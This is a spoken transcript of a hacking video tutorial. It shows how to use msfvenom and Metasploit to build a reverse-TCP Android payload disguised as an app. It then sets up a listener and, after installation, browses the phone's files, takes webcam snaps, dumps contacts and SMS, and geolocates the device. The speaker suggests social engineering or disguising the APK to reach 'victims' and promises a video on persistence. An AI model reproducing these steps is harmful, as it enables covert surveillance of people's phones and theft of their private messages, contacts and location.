Calling all security researchers and pen testers. Bugcrowd pays up to $15,000 per bug in top tech companies, working with companies like Tesla Motorsports, Dropbox, Western Union, and many others. Join the hunt and learn more at bugcrowd.com/jacktutorials. Hey guys, welcome back to a new video tutorial. Today I'm going to be showing you how you can hack any Android device using Kali Linux and Metasploit. So I've already done a video like this before. It was with DroidJack, and DroidJack is a remote administration tool for Android. You can watch that video that is on screen now. However, DroidJack costs money, and it's $150 or something along them lines. But obviously the benefits of it is that you get a nice UI. You don't need to use Linux if you're not a big fan of it, and it does a lot of the heavy lifting for you. But if you just want to do something that just flat out works, this is, it's really useful. So we are going to be using Metasploit for this, and we're going to be opening up a reverse TCP connection on an Android phone. The method of you getting it onto the phone is completely up to you. You can go through social engineering, making the application look like something that it isn't, or maybe binding it. I may have videos on them in the future, but I'm not too sure if I will or not. But anyway, let's just get started with this video. So what you're going to need is a Kali Linux 2.0 installation or Metasploit. Kali Linux isn't really necessary here. And you're also going to need to be on the same network as the phone. This isn't a requirement, and you can port forward. However, I'm doing this on LAN, and basically the phone is connected to Wi-Fi, and this Kali Linux machine is also connected to that network. So they are all using IP addresses within the 192.168.1 subnet. So yeah, let's get started straight away then. So what we're going to do first is use MSF Venom, and that is going to generate a payload for us. So you just need to type in MSF Venom-P for payload, and then just do Android/interpreter/reverse TCP. And you want to set the L host to be your IP address. So mine, for example, is 192.168.1.117, and you want to set the L port to be 4444, which is the default port. Then do an uppercase R, and then you want to do a little export bracket like this, and we're just going to call this shell.apk, and hit enter, and that's going to generate our payload, which we will send to our victims, because obviously the shell.apk file is the installation file used by Android. So yeah, I keep doing this, I don't know why, but you need to put equal signs in between lhost and lport. I've done that twice now, but yeah. So just put equal signs in there, and you can generate the payload like that. And what you should get is something similar to my output here. So you can see that we have the no platform was selected, choosing the Android platform. No architecture was selected, so it's choosing the default one, and also the no encoder or bad characters specified, so output in the raw payload. And this is exactly what we want. And if you go into your root folder now, we have a file called shell.apk, and you need to get this onto the phone somehow. So there's a variety of ways you can do this. You can use Xanti. What I originally wanted to do was do Xanti and intercept a download, so that the user would download something from the website, but what it would actually download is this APK file, and obviously that just works flawlessly. But I don't have them requirements at the moment, so we're just going to simply drag and drop that shit. So you're going to open up MSF console as well, which is going to be our listener. What we're going to do is configure MSF console to listen for the connection back, and then you're going to need to get this shell.apk file onto the Android phone somehow, so you can drag and drop if you have VMware tools installed. But for me, I'm just going to upload it to Mega and then download it again and then drag it across. So I'm going to pause the video while I do that, and yeah. So all I've done here is I've set up an Apache 2 start, that starts the web server, and then I've put shell.apk in the web server, and now that file is on my phone. So all I need to do now is configure MSF console and then install the shell. So what we're going to do here is then use exploit/multi/handler, and then we're going to set the payload to be the same as the one we set up previously, which is Android/interpreter/reverse TCP. We want to also set up our L host, so that's going to be 192.168.1.117. This is the same IP address as the one that you used before. This is the IP address of your machine. And then you're going to set the L port to 4444. Again, it needs to be the same as the one you used before. And then we can simply type exploit, and that's going to start listening. So on the phone end, I'm going to go ahead and install the shell.apk file. I'm going to press next and install, and that will automatically run. And I've taken a screenshot of what it's going to look like to the user, and they're on screen now, but it's called media, what's it called, media main activity. And you can see here in our MSF console we have an interpreted session opened up on the phone, so you can see that this is the IP address of the phone and the port number. And if you type help, you can get the the different commands you can type into the shell, into the console here, and you can get things like that. So for example, if I do check root, you'll see that my phone is not rooted. If I do ls, you can start browsing through the file system. So let's see. Yeah, you can see we can start browsing through the file system and moving around. So if I do this, we are now in the home folder, and you can go ahead and take whatever you want. So if I've got SD card and then ls, well, something like that. That's weird. But yeah. So let's just clear that. Let's just type help in again so you can see what other commands we can have. So you can get webcam snap, webcam stream, but what I found is that this will actually crash my device. But if I do webcam list, will that work? So yeah, you can see we get back camera and front camera. So I wonder if I just do webcam, I'm just going to snap 2, will that work? Oh, it did work. Okay, so we can actually open this up and see what we get. So you can see that it is completely black because it's looking, down. Although I would have expected that to actually do the other one. Oh well, maybe it doesn't work if the phone's locked, which it looks like it might be the case. Anyway, moving on. We can get a list of the running processes with I type in PS. We can use shell to drop into the system. So shell, of course, now we are actually in the system and we have access to all kinds of commands. I'm just going to Control C out of that and terminate that channel. What was the other command I just saw there? We can do sysinfo, which will give us some information about the phone. So we've got Android 5.1.1, which is running Linux, architecture 64, and also the interpreter is running at Java/Android. And then obviously you've got your normal commands up here. You can upload and search for files, remove directories and things like that. And then there's some fun commands down here, such as dump call log, dump contacts, dump SMS. So if I just do dump underscore contacts, so let's get all the contacts from the phone. And then there's another one in there as well that I'm going to show you, which is geolocate. So you can see that we've dumped some contacts. Let's dump the SMS. And I'll show you what that looks like, although I might need to do some censoring. This is just a reminder for my editing. And as you guys know, my censoring has been pretty fucking poor. So we'll just run them commands there. So dump SMS, dump contacts, and that's going to save them locally for us as well. Operation timed out, okay, fair enough. Yeah, and then also with the geolocate, if you type in geolocate, it will get the longitude and latitude of where the phone is expected to be, and I've clicked this link and it is actually pretty accurate. It got me on my road. It says within 50 miles, so I'm not going to open that link just because I don't want to risk exposing my address, which probably already exists anyway. But if we open up this contacts.dump file, you can see that we have lots of contacts in here that I need to censor. But yeah, that dumps the whole contacts. So that's sweet. And yeah, so that is how you open up a reverse TCP. So in a couple of videos time I'm going to do how to make this persistent, because obviously if we Control C out of this and exit like this, we no longer have a connection, I don't think. Yeah. So what happens is the user will have to open up the main activity window again. So if you click that, you can see we get a session again and we're back into the phone. But what we want is so that the phone is always trying to connect, and we're going to work on that in a future video. This is quite a quick video, but the reason why is because I've been busy this week, but I have some really good videos coming. I'm going to be doing some Bluetooth hacking, I'm going to be doing some more bad USB stuff because you guys love that. I'm going to be doing some programming. I'm going to start working on my Friday programming session, but for now this is just something to keep you tied. So yeah, have fun with it. Please like and comment and subscribe if you enjoyed this video. Share it around with people you think may enjoy it as well. Feel free to follow me on Twitter, that is @Jack1337, and feel free to follow me on Twitch, that is @Jack1337, and feel free to like me on Facebook, that is facebook.com/JackTutorials. Those are on screen now. And yeah, I don't really have much to say. So thank you very much for watching. Please like, comment and subscribe, and I shall see you again in the next one.